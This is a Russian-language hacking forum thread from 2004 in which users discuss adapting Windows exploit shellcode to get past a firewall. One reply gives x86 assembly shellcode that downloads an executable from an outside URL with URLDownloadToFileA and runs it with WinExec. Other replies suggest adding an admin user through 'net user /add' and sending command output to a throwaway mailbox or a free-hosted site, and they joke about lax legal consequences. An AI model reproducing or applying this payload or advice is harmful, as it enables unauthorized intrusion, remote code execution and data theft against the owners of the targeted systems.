Надо найти шелл-код, который выполнит данныу операцию. Поищи...04.01.04 22:06 Число просмотров: 2052 Автор: Ilich Статус: Незарегистрированный пользователь
Дайте инфу или подскажите каким образом надо модифицировать код эксплоита который даёт шелл, таким образом чтоб он выполнил несколько команд баз открытия порта!
Есть проги которые помогают создать шеллкод?05.01.04 18:12 Автор: SpAuT Статус: Незарегистрированный пользователь
> Дайте инфу или подскажите каким образом надо модифицировать > код эксплоита который даёт шелл, таким образом чтоб он > выполнил несколько команд баз открытия порта! Есть проги которые помогают создать шеллкод?
Ага05.01.04 21:12 Автор: amirul <Serge> Статус: The Elderman
Надо написать прогу на си (или можно на си++) , компилить тока под виндами ( если это переделать
#include <stdio.h>
main()
{
char *shell[2];
shell[0] = "/bin/sh";
shell[1] = NULL;
execve(shell[0], shell, NULL);
}
на это
#include <stdio.h>
main()
{
char *shell[2];
shell[0] = "c:\windows\system32\cmd.exe";
shell[1] = NULL;
execve(shell[0], shell, NULL);
}
Какой самый маленький дизассемблер ( по размеру файла)?
ну ты даешь...06.01.04 05:09 Автор: DgtlScrm Статус: Member Отредактировано 06.01.04 05:12 Количество правок: 1
на переносимость я так полагаю ты не рассчитываешь? Как знаешь... но тогда лудше всеравно пиши на асме:
xor ebx, ebx;
add dh, 0xff;
// app name: http://www.ietest1.by.ru/fooware.exe
mov dword ptr[edx-0x28],0x70747468;// save "http"
mov dword ptr[edx-0x24],0x772f2f3a; // save "://w"
mov dword ptr[edx-0x20],0x692e7777;// save "ww.i"
mov dword ptr[edx-0x1c],0x73657465;// save "etes"
mov dword ptr[edx-0x18],0x622e3174;// save "t1.b"
mov dword ptr[edx-0x14],0x75722e79;// save "y.ru"
mov dword ptr[edx-0x10],0x6f6f662f; // save "/foo"
mov dword ptr[edx-0x0c],0x65726177;// save "ware"
mov dword ptr[edx-0x08],0x6578652e;// save ".exe"
mov dword ptr[edx-0x04],ebx;// fill with \x00 on the end
lea eax, [edx-0x28];
add dh, 0xff
mov dword ptr[edx-0x0c],0x785c3a63;// save "c:\X" (file to download)
mov dword ptr[edx-0x08],0x6578652e;// save ".exe"
mov dword ptr[edx-0x04],ebx;// fill with \x00 on the end
lea ecx, [edx-0x0c];// move ecx addr of string (file name)
pop ebx; //set ebx to URLDownloadToFileA entry point
push edx
xor edx,edxset edx to zero
push edx
push edx
push ecx
push eax
push edx
call ebx
pop edx; // restore str addr
// Execute downloaded file:
pop eax; // get WinExec address
xor ebx,ebx
add dh, 0xff
mov dword ptr[edx-0x0c],0x785c3a63;// save "c:\X" (file to download)
mov dword ptr[edx-0x08],0x6578652e;// save ".exe"
mov dword ptr[edx-0x04],ebx;// fill with \x00 on the end
lea ecx, [edx-0x0c];// move ecx addr of string (file name)
push 0x01
push ecx
call eax
---
А адреса URLDownloadToFile и WinExec ищи как хочешь, уже не маленький :)
(извеняюсь за такой некрасивый код, просто я его выдрал с одного из своих первых спроитов %) )
А ты хотел в килобайтах? Нормальный сплоит поменьше сотни байт это однозначно :)
Этот пример закачивает и запускает. Кстати нащет дизассемблера - это был прикол такой??? Если нет, то сначала немного почитай... (не прийми это как обиду, это просто совет... я когда-тоже такой был :) а наверное таким и остался :) )
неплохая имхо инфа по написанию шеллкодов06.01.04 11:05 Автор: vladik_ Статус: Незарегистрированный пользователь Отредактировано 06.01.04 11:05 Количество правок: 1
Не знаю как насчет малой. Но W32Dasm когда надо просто глянуть дизасм проги у которой нет никаких вы?бонов против дизасма - имхо самое то. Занимает он у меня 1.4мб
Не знаю не знаю. В bochs-е дизасм весит 97 кило :-) [upd]05.01.04 23:56 Автор: amirul <Serge> Статус: The Elderman Отредактировано 06.01.04 00:00 Количество правок: 1
> Короче на машине стоит файрволл (win2k) и надо чтоб сплоит > создал пользавотеля с правами админа!Не открывая шелл!
почитай MSDN о том как создать пользователя. Я так понимаю ты работаешь с переносимым шеллкодом??? Вот и найди все необходимые функции, которые тебе понадобятся, вычили шеллкодом их адреса и исполняй. Только если машина удаленная и вдобавок фаервол, то созданный пользователь тебе не пригодится. Лудше организуй систему исполнения комманд, а результаты работы высылай на левое мыло... или если даже SMTP заблокирован, то создай на H1.RU сайтец и через веб сабмить все данные туда.
Но закон не дремлет :) Хотя и ответственность у нас не такая уж и высокая :)
Дополнение05.01.04 11:21 Автор: amirul <Serge> Статус: The Elderman
> почитай MSDN о том как создать пользователя. Я так понимаю > ты работаешь с переносимым шеллкодом??? Вот и найди все > необходимые функции, которые тебе понадобятся, вычили > шеллкодом их адреса и исполняй. Только если машина Можно даже и без этого обойтись. Просто вместо "cmd.exe" в самом конце сплойта запускать "net user /add"
> удаленная и вдобавок фаервол, то созданный пользователь > тебе не пригодится. Лудше организуй систему исполнения > комманд, а результаты работы высылай на левое мыло... или > если даже SMTP заблокирован, то создай на H1.RU сайтец и > через веб сабмить все данные туда. > > Но закон не дремлет :) Хотя и ответственность у нас не > такая уж и высокая :) Во всем остальном полностью согласен
> Дайте инфу или подскажите каким образом надо модифицировать > код эксплоита который даёт шелл, таким образом чтоб он > выполнил несколько команд баз открытия порта! Обычно делается ShellExecute с "open"-ом для cmd.exe или CreateProcess с путем к файлу cmd.exe.
Причем до этого должны находиться всякие заморочки, которые инициализируют винсок, открывают сокет и перенаправляют ввод/вывод создаваемого процесса в этот сокет. Тебе просто надо поудалять эти вещи и поклонировать части с созданием процесса для других команд.
Можно чуть внятнее - что ты не хочешь открывать? :)04.01.04 15:46 Автор: Ktirf <Æ Rusakov> Статус: Elderman
подробно о проекте
Анализ криптографических сетевых...
новое сообщение
закрытая нитка
новое сообщение
в закрытой нитке
старое сообщение
